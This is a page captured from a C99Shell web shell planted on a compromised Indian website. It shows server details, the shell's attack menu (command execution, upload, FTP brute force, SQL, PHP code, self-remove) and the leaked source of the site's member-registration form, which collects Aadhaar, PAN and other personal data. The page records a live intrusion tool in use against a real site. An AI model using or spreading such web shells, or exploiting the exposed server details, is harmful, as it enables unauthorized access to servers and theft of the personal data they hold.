!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/studentlogin/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addmember.php (7.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include ('membercode.php'); ?>
<?php 
include('session.php'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Add Member Form </title>
<script src="SpryAssets/SpryMenuBar.js" type="text/javascript"></script>
<link href="SpryAssets/SpryMenuBarHorizontal.css" rel="stylesheet" type="text/css" />
<style type="text/css">
table {
    border: 0px solid green;
    border-collapse: collapse;
    width:100%;
}

table td {
    border: 0px solid green;
}

table td.shrink {
    white-space:nowrap
}
table td.expand {
    width: 99%
}


</style>
<style style="text/css">
      .hoverTable{
        width:100%; 
        border-collapse:collapse; 
    }
    .hoverTable td{ 
        padding:7px; border:#4e95f4 1px solid;
    }
    /* Define the default color for all the table rows */
    .hoverTable tr{
        background: #b8d1f3;
    }
    /* Define the hover highlight color for the table row */
    .hoverTable tr:hover {
          background-color: #ffff99;
    }
</style>
</head>
<center>
<body>

<table  border="0" bgcolor="#FFFFFF" width="100%">
  <tr>
    <td ><?php include('header.php'); ?></td>
    <td width="0" align="center"></td>
  </tr>
  <tr>
    <td colspan="2"><table width="100%" border="0">
      <tr>
        <td colspan="3" bgcolor="#CCCCCC"><?php include('menubar.php'); ?></td>
      </tr>
      <tr>
        <td width="218" bgcolor="#6699CC">Welcome <?php echo $user ?></td>
        <td width="349" bgcolor="#6699CC"><a href="logout.php">Logout</a></td>
        <td width="440" bgcolor="#6699CC"><?php echo "Today is " date("d/m/y") . "<br>";?></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td colspan="2" align="left">
  
       
         <form id="form1" name="form1" method="post" action="member_print.php">
   
    
   
      <table width="1020" border="0">
        <tr>
          <td height="22" colspan="6" bgcolor="#FF0000">&nbsp;</td>
          </tr>
        <tr>
          <td width="161" height="22" bgcolor="#FFCC33">Member Code</td>
          <td width="173" bgcolor="#FF9900"><label for="textfield">
            <input name="membercode" type="text"  required="required" id="membercode"  value="<?php echo $nmembercode?>" readonly="readonly" />
          </label></td>
          <td width="158" bgcolor="#FFCC33">Rank</td>
          <td width="181" bgcolor="#FF9900"><label for="rank"></label>
            <select name="rank" id="rank">
              <option>1</option>
              <option>2</option>
              <option>3</option>
              <option>4</option>
              <option>5</option>
              <option>6</option>
              <option>7</option>
              <option>8</option>
              <option>9</option>
              <option>10</option>
              <option>11</option>
              <option>12</option>
              <option>13</option>
            </select></td>
          <td width="141" bgcolor="#FFCC33">Branch</td>
          <td width="151" bgcolor="#FF9900"><input name="branchname" type="text" value="<?php echo $user ?>" />
          
          
          
          </td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Name</td>
          <td bgcolor="#FF9900"><input type="text" name="name" id="name"  required="required" tabindex="2"/></td>
          <td bgcolor="#FFCC33">Middle Name</td>
          <td bgcolor="#FF9900"><input type="text" name="mmidname" id="mmidname" /></td>
          <td bgcolor="#FFCC33">Surname</td>
          <td bgcolor="#FF9900"><input type="text" name="msurname" id="msurname" /></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Father/Husband Name</td>
          <td bgcolor="#FF9900"><input type="text" name="fname" id="fname" /></td>
          <td bgcolor="#FFCC33">Father Mid Name</td>
          <td bgcolor="#FF9900"><input type="text" name="fmidname" id="fmidname" /></td>
          <td bgcolor="#FFCC33">Father Sur Name</td>
          <td bgcolor="#FF9900"><input type="text" name="fsurname" id="fsurname" /></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Village</td>
          <td bgcolor="#FF9900"><input type="text" name="village" id="village" /></td>
          <td bgcolor="#FFCC33">Post</td>
          <td bgcolor="#FF9900"><input type="text" name="post" id="post" /></td>
          <td bgcolor="#FFCC33">District</td>
          <td bgcolor="#FF9900"><input type="text" name="distt" id="distt" /></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">State</td>
          <td bgcolor="#FF9900"><input type="text" name="state" id="state" /></td>
          <td bgcolor="#FFCC33">Pin</td>
          <td bgcolor="#FF9900"><input type="text" name="pin" id="pin" /></td>
          <td bgcolor="#FFCC33">PAN</td>
          <td bgcolor="#FF9900"><input type="text" name="pan" id="pan" /></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Aadhar No</td>
          <td colspan="2" bgcolor="#FF9900"><input name="aadharno" type="text" id="aadharno" size="50" maxlength="50" /></td>
          <td bgcolor="#FFFFFF">&nbsp;</td>
          <td bgcolor="#FFCC33">Occupation</td>
          <td bgcolor="#FF9900"><input name="occupation" type="text"  required="required" id="occupation" tabindex="6"/></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Date of Birth</td>
          <td bgcolor="#FF9900"><input name="dob" type="text"  required="required" id="dob" tabindex="5"/></td>
          <td bgcolor="#FFCC33">Phone No.</td>
          <td bgcolor="#FF9900"><input type="text" name="phoneno" id="phoneno"  required="required" tabindex="8"/></td>
          <td bgcolor="#FFCC33">Nationality</td>
          <td bgcolor="#FF9900"><input name="nationality" type="text"  required="required" id="nationality" tabindex="11" value="indian"/></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">Regst. Fees</td>
          <td bgcolor="#FF9900"><input type="text" name="experience" id="experience"  required="required" tabindex="10"/></td>
          <td bgcolor="#FFCC33">Nominee Name</td>
          <td bgcolor="#FF9900"><input type="text" name="nomineename" id="nomineename"  required="required" tabindex="14"/></td>
          <td bgcolor="#FFCC33">Relationship</td>
          <td bgcolor="#FF9900"><input type="text" name="relationship" id="relationship"  required="required" tabindex="15"/></td>
        </tr>
        <tr>
          <td bgcolor="#FFCC33">.Religion</td>
          <td bgcolor="#FF9900"><input name="religion" type="text" required="required" id="religion" tabindex="12"/></td>
          <td bgcolor="#FFCC33">&nbsp;</td>
          <td bgcolor="#FF9900">&nbsp;</td>
          <td bgcolor="#FFCC33">&nbsp;</td>
          <td bgcolor="#FF9900">&nbsp;</td>
        </tr>
        <tr>
          <td colspan="6" bgcolor="#FF0000">&nbsp;</td>
          </tr>
        <tr>
          <td colspan="6" align="center" valign="middle"><input type="submit" name="button" id="button" value="ADD" tabindex="21"/></td>
        </tr>
      </table>
</form>
    
     </td>
  </tr>
  <tr>
    <td colspan="2" bgcolor="#CCCCCC"><?php include('footer.php'); ?></td>
  </tr>
</table>

</body></center>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0018 ]--